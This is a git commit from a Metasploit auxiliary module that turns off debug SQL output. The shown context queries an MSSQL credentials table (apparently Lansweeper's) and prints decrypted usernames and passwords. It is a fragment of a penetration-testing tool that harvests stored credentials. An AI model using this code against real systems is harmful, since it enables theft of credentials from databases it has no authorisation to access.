Removes debug sql output

bug/bundler_fix
cldrn 2015-06-26 12:22:34 -05:00
parent a338920cb3
commit 2968f52ca4
1 changed files with 1 additions and 1 deletions

View File

@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary
def run
result = mssql_query('select Credname, Username, Password from ' + datastore['DATABASE'] +
'.dbo.tsysCredentials WHERE LEN(Password)>64', true) if mssql_login_datastore
'.dbo.tsysCredentials WHERE LEN(Password)>64', false) if mssql_login_datastore
result[:rows].each do |row|
print_good("Credential name: #{row[0]} | username: #{row[1]} | password: #{lswdecrypt(row[2])} ")
end